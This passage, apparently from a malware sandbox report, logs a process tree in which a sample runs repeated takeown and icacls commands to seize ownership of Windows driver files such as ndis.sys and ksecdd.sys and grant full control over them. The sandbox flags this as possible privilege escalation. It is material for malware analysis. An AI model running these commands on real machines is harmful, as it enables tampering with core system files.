- Modifies file permissions
PID:752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit2⤵PID:3048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit2⤵PID:2572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\agilevpn.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit2⤵PID:2464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AGP440.sys3⤵PID:2020
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"3⤵PID:1084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit2⤵PID:916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\aliide.sys3⤵PID:1628
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit2⤵PID:2476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdide.sys3⤵PID:1952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit2⤵PID:1596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdk8.sys3⤵PID:696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit2⤵PID:1252
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdppm.sys3⤵
- Possible privilege escalation attempt
PID:2108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit2⤵PID:2760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsata.sys3⤵PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit2⤵PID:1084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsbs.sys3⤵PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit2⤵PID:3012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdxata.sys3⤵
- Modifies file permissions
PID:696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"3⤵PID:1952
-
-
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irda.sys3⤵PID:3196
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"3⤵PID:3536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit2⤵PID:3856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irenum.sys3⤵PID:4088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"3⤵PID:3388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:4012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵PID:4032
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:4084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵PID:3244
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:3312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:3680
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵PID:3720
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:3468
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵PID:2416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:3872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵
- Modifies file permissions
PID:3604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:4000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵PID:3528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:3276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵
- Possible privilege escalation attempt
PID:2928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit2⤵PID:3988
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_fc.sys3⤵PID:3192
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"3⤵PID:3540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:3812
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵
- Modifies file permissions
PID:3852
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit2⤵PID:3104
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2.sys3⤵PID:3628
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit2⤵PID:3888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_scsi.sys3⤵PID:3704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:3936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:3132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:3732
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵PID:3720
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:3504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit2⤵PID:3768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas.sys3⤵PID:4056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"3⤵PID:3684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit2⤵PID:1192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSR.sys3⤵PID:3708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"3⤵PID:3136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:3320
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵PID:3620
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:4080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵PID:3536
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:3192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:3244
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵PID:3460
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:3776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵PID:4064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit2⤵PID:3128
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpio.sys3⤵PID:4076
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:4048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:2232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"3⤵PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:3924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵PID:4072
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:3268
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵PID:2928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:3508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:3536
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"3⤵PID:3752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:3308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵PID:1324
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:1704
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵PID:3860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵PID:3604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:3204
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵PID:4068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:3652
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:3860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:3356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵
- Modifies file permissions
PID:1324
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"3⤵PID:3568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:2472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵PID:3364
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"3⤵PID:3548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:3752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵
- Possible privilege escalation attempt
PID:4056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:3968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵PID:1060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:2416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵PID:2972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:3076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵PID:3592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"3⤵PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵
- Possible privilege escalation attempt
PID:3692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"3⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:3208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵PID:2860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:3132
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵PID:4056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"3⤵PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:3568
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:3704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"3⤵PID:3360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:2664
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:3136
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"3⤵PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:2972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵
- Modifies file permissions
PID:3620
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"3⤵PID:4056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:2632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:3196
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:3920
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵PID:3092
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:3884
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:3788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵
- Possible privilege escalation attempt
PID:3068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:3300
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:3196
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵PID:4104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵PID:4160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:3140
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵PID:4112
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"3⤵PID:4192
-
-
-
